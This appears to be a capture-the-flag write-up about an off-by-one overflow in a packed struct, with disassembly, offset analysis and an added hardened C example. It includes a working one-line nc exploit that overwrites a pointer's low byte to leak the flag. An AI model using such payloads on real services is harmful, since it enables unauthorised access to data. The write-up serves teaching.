Glob

Packed Structures

GDB -> disas main:

.
.
0x00000000004012ba <+104>:  call   0x4010c0 <printf@plt>
0x00000000004012bf <+109>:  lea    rax,[rip+0x2dda]        # 0x4040a0 <program_data+32>
0x00000000004012c6 <+116>:  mov    QWORD PTR [rip+0x2df3],rax        # 0x4040c0 <program_data+64>
0x00000000004012cd <+123>:  mov    edx,0x21
0x00000000004012d2 <+128>:  lea    rax,[rip+0x2dc7]        # 0x4040a0 <program_data+32>
0x00000000004012d9 <+135>:  mov    rsi,rax
0x00000000004012dc <+138>:  mov    edi,0x0
0x00000000004012e1 <+143>:  call   0x4010d0 <read@plt>
.
.

From the addresses in the disassembly:

program_data.message is at 0x4040c0 (program_data+64)
program_data.username is at 0x4040a0 (program_data+32)
program_data.flag must be at 0x404080 (program_data+0)

The read() call accepts 0x21 = 33 bytes, but username[] is only 32 bytes, so the 33rd byte lands in the low byte of the message pointer that immediately follows it. Overwriting that byte with 0x80 makes message point to flag[] at 0x404080:

echo -n -e "hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh\x80" | nc rivit.dev 10022
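As an added example (not code from the writeup or the challenge binary), here is the struct layout the offsets above imply, with a bounded username copy that refuses the extra byte instead of letting it reach the pointer. The field names, the sizes and the initial value of message are assumptions inferred from the disassembly.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Layout inferred from the disassembly (assumption): flag at +0,
 * username at +32, message pointer at +64. Packed, so nothing sits
 * between the end of username[] and the first byte of message. */
struct __attribute__((packed)) program_data {
    char flag[32];
    char username[32];
    char *message;
};

/* The original read(0, username, 0x21) allows one byte more than
 * sizeof(username); that byte is the low byte of message. */
#define VULNERABLE_READ_LEN 0x21

/* Hardened copy: bound the length by the destination, keep room for a
 * terminating NUL. Returns bytes stored, or -1 if the input is too long. */
int set_username(struct program_data *pd, const char *in, size_t len)
{
    if (len >= sizeof(pd->username))   /* 32+ bytes cannot fit with a NUL */
        return -1;
    memcpy(pd->username, in, len);
    pd->username[len] = '\0';
    return (int)len;
}

/* Integrity check: does message still point at username[]? */
int message_intact(const struct program_data *pd)
{
    return pd->message == pd->username;
}

int main(void)
{
    struct program_data pd = { "FLAG{constructed}", "", NULL };
    pd.message = pd.username;               /* assumed initial value */
    char input[VULNERABLE_READ_LEN];        /* constructed 33-byte input */
    memset(input, 'h', sizeof input);
    printf("username at +%zu, message at +%zu\n",
           offsetof(struct program_data, username),
           offsetof(struct program_data, message));
    printf("33-byte input: %s\n",
           set_username(&pd, input, sizeof input) < 0
               ? "rejected, message pointer intact" : "accepted");
    return 0;
}
```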